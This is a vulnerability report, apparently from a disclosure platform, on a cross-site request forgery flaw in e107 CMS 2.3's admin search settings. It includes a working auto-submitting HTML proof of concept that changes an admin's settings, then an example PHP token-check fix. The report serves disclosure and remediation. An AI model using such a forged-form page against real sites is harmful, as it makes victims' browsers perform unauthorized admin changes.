Cross-Site Request Forgery (CSRF) in e107inc/e107
Valid
Reported on Sep 13th 2021
✍️ Description
An attacker or malicious user is able to change the search settings if a logged-in user visits the attacker's website, because the settings request lacks a CSRF token.
🕵️♂️ Proof of Concept
1. While logged in, open this POC.html in the same browser.
2. Observe that some search settings have been changed without your intent.
//POC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8181/ecms-full/e107_admin/search.php" method="POST">
<input type="hidden" name="core_handlers[comments][class]" value="252" />
<input type="hidden" name="core_handlers[comments][order]" value="2" />
<input type="hidden" name="core_handlers[users][class]" value="0" />
<input type="hidden" name="core_handlers[users][order]" value="3" />
<input type="hidden" name="plug_handlers[news][class]" value="0" />
<input type="hidden" name="plug_handlers[news][order]" value="1" />
<input type="hidden" name="plug_handlers[page][class]" value="0" />
<input type="hidden" name="plug_handlers[page][order]" value="1" />
<input type="hidden" name="plug_handlers[user][class]" value="0" />
<input type="hidden" name="plug_handlers[user][order]" value="1" />
<input type="hidden" name="google" value="0" />
<input type="hidden" name="comments_handlers[news][class]" value="0" />
<input type="hidden" name="update_main" value="no-value" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
💥 Impact
This vulnerability is capable of forcing a user to change the search settings unintentionally.
💥 Test
Tested on version 2.3 with Firefox and Safari.
💥 Fix
You should require a CSRF token on this request and reject any submission that does not carry a valid one.
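The following is an added example of the synchronizer-token pattern the fix calls for; it is not e107's own code and does not use e107's form or session API. The function names, the session key and the hidden-field name `csrf_token` are assumptions chosen for this example, as is the simplified form at the bottom, which stands in for the admin search-settings form.

```php
<?php
// Added example (not e107's own code): synchronizer-token CSRF protection
// for a state-changing settings form. Names below are assumptions.

session_start();

// Create one unpredictable token per session, using a CSPRNG.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Verify the token that arrived with a POST. Untyped parameter so that a
// missing value (null) or a tampered array value is rejected, not fatal.
// hash_equals() compares in constant time.
function csrf_check($submitted): bool
{
    if (empty($_SESSION['csrf_token']) || !is_string($submitted)) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

// Hidden field to embed in every form that changes settings.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '" />';
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Check the token before touching any setting. A form posted from a
    // third-party origin cannot read the victim's session token, so it
    // is refused here and the handlers below never run.
    if (!csrf_check($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    // Only now apply the core_handlers / plug_handlers / google changes.
    echo 'Search settings updated.';
    exit;
}
?>
<form action="search.php" method="POST">
  <?= csrf_field() ?>
  <input type="hidden" name="google" value="0" />
  <input type="submit" value="Save" />
</form>
```

The token must be checked on every handler that changes state, including `update_main`, not only on the form that renders it. Marking the session cookie `SameSite=Lax` adds defence in depth against cross-site form posts, but it does not replace the token check, since older browsers and some navigation cases do not enforce it.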
References
We have contacted a member of the e107inc/e107 team and are waiting to hear back.